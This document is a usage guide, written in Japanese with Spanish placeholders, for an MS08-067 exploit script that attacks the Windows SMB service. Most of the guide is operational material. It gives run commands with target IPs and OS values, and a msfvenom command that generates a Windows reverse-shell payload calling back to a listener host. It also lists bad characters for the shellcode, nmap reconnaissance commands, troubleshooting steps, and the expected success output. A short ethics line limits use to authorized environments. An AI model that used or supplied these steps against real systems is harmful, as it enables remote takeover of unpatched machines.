完全な使用ガイド: # Exploit MS08-067 改良版
📌 基本的な使用方法
python3 Exploit_MS08-067.py <IP_VÍCTIMA> <VERSIÓN_OS> [OPCIONES]
🎯 実践的な例
1. Windows XP SP0/SP1 (デフォルトポート 445)
python3 Exploit_MS08-067.py 192.168.1.100 1
2. Windows 2003 SP1 English (ポート 139)
python3 Exploit_MS08-067.py 192.168.1.150 4 -p 139
3. カスタムシェルコードを使用
python3 Exploit_MS08-067.py 192.168.1.200 6 -s /ruta/mishellcode.bin
🔍 必須パラメータ
| パラメータ | 説明 | 有効な値 |
|---|
IP_VÍCTIMA | 対象のIP | 任意のIPv4 |
VERSIÓN_OS | 脆弱なOSのバージョン | 1-7 (表を参照) |
📋 サポートされているバージョン一覧
| 値 | オペレーティングシステム | アーキテクチャ |
|---|
| 1 | Windows XP SP0/SP1 Universal | x86 |
| 2 | Windows 2000 Universal | x86 |
| ... | ... | ... |
⚙️ 追加オプション
| オプション | 説明 | デフォルト |
|---|
-p/--port | SMBポート (445/139) | 445 |
-t/--timeout |
🛠️ msfvenom によるシェルコードの生成
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.201 LPORT=4484 \
EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode \
-a x86 --platform windows
🔎 ターゲットの識別
nmap -p 139,445 --script smb-os-discovery <IP_VÍCTIMA>
🚨 よくある問題の対処
エラー: STATUS_OBJECT_NAME_NOT_FOUND
-
Browser サービスがアクティブかどうか確認します:
nmap -p 445 --script smb-enum-shares <IP>
-
別のパイプを試します (スクリプトを変更):
# Cambiar \\pipe\\browser por \\pipe\\srvsvc
シェルコードが実行されない
- 禁止文字を確認してください:
\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
- 検証には次のコマンドを使用します:
msfvenom -p windows/exec CMD="calc.exe" -f raw | xxd | grep -E "00|0a|0d|5c|5f|2f|2e|40"
💡 倫理的な推奨事項
✅ 許可された環境でのみ使用する
❌ 許可なく本番システムでは決して使用しない
📊 期待される成功時の出力
[*] Targeting 192.168.1.100 | OS: 1 | Port: 445
[+] Connected to 192.168.1.100 on port 445
[*] Sending exploit...
[+] Exploit finished - Check your listener!
⚠️ 注: このエクスプロイトは、MS08-067 のパッチが適用されたシステムでは動作しません。